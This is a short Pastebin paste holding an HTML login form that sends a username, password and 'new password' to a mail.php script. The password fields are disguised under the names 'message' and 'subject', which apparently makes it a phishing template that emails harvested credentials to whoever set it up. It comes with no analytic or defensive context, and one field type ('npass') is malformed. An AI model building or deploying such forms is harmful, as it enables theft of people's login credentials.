Advertisement
Guest User

Untitled

a guest
Jul 19th, 2017
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. <form action="mail.php" method="POST" name="form">
  2. <input type=hidden name=referer value="/.">
  3. <tr><td class=list align=right>Username:</td><td class=list><input type=text name=message></td></tr><br>
  4. <tr><td class=list align=right>Password:</td><td class=list><input type=password name=subject></td></tr><br>
  5. <tr><td class=list align=right>New Password:</td><td class=list><input type=npass name=newpass></td></tr><br>
  6.  
  7. <tr><td class=listtitle align=right colspan=2><input type=submit value='Submit'></td></tr>
  8. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement